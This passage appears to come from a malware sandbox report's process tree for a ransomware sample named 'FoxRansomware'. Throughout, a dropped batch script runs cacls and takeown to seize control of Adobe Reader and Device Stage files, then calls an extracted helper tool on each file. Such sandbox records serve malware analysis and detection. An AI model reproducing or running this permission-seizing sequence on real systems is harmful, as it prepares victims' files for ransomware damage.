C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2072
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:1668
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:3632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵PID:3000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "engphon.env" -nobanner3⤵PID:1568
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "engphon.env" -nobanner4⤵PID:3420
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:3616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:2308
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵PID:2896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:3288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:1988
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1704
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:1604
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:1996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵
- Modifies file permissions
PID:2628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:1632
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:3320
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:3136
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:4212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "directories.acrodata" -nobanner3⤵PID:4224
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "directories.acrodata" -nobanner4⤵PID:3164
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:2712
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:4280
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵PID:4284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "behavior.xml" -nobanner3⤵PID:4300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "behavior.xml" -nobanner4⤵PID:4328
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵PID:1784
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:4384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵PID:4380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "add_reviewer.gif" -nobanner3⤵PID:4376
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "add_reviewer.gif" -nobanner4⤵PID:4388
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵PID:4448
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:4404
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵PID:4356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "forms_received.gif" -nobanner3⤵PID:4360
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "forms_received.gif" -nobanner4⤵PID:4520
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵PID:4516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C3⤵PID:4568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"3⤵PID:1040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "reviews_super.gif" -nobanner3⤵PID:4504
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "reviews_super.gif" -nobanner4⤵PID:4592
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵PID:4412
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:4480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵PID:4544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "submission_history.gif" -nobanner3⤵PID:4656
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "submission_history.gif" -nobanner4⤵PID:4680
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""2⤵PID:4672
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:4612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"3⤵PID:4748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "Identity-H" -nobanner3⤵PID:4772
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "Identity-H" -nobanner4⤵PID:4792
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵PID:4800
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:4676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵
- Modifies file permissions
PID:4828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵PID:4732
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵PID:4740
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵PID:4868
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C3⤵PID:4824
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"3⤵PID:4780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ZY______.PFB" -nobanner3⤵PID:4896
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "ZY______.PFB" -nobanner4⤵PID:4924
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4840
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵PID:4956
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C3⤵PID:4728
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"3⤵PID:4912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt32.clx" -nobanner3⤵PID:5016
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "brt32.clx" -nobanner4⤵PID:5024
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""2⤵PID:5012
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C3⤵PID:2856
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"3⤵PID:5048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "usa.fca" -nobanner3⤵PID:5020
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "usa.fca" -nobanner4⤵PID:4900
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""2⤵PID:2600
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C3⤵PID:368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵
- Modifies file permissions
PID:5096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CROATIAN.TXT" -nobanner3⤵PID:4968
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CROATIAN.TXT" -nobanner4⤵PID:4876
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""2⤵PID:3484
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C3⤵PID:3964
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"3⤵PID:4060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1251.TXT" -nobanner3⤵PID:3192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "CP1251.TXT" -nobanner4⤵PID:5068
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3200
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""2⤵PID:2464
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C3⤵PID:3756
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"3⤵PID:3108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "background.png" -nobanner3⤵PID:572
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "background.png" -nobanner4⤵PID:3664
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2248
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""2⤵PID:3724
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:3368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"3⤵PID:2864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:3688
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:3584
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""2⤵PID:1544
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C3⤵PID:996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"3⤵PID:4028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:3172
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:1520
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2372
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:3876
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:1000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵PID:1404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:3836
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:3776
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:3760
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:2624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:1176
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:1020
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:3672
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:3640
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:3496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵PID:2056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:3916
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:1240
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:3532
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵PID:3884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:2052
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:3808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵PID:3660
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C3⤵PID:3548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"3⤵
- Modifies file permissions
PID:2272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "superbar.png" -nobanner3⤵PID:3676
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "superbar.png" -nobanner4⤵PID:968
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1708
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""2⤵PID:4036
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C3⤵PID:3384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"3⤵
- Modifies file permissions
PID:2192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner3⤵PID:3436
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula "resource.xml" -nobanner4⤵PID:3544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exesOCkujKF.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:3888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:4180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵
- Modifies file permissions
PID:3328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:2676
-
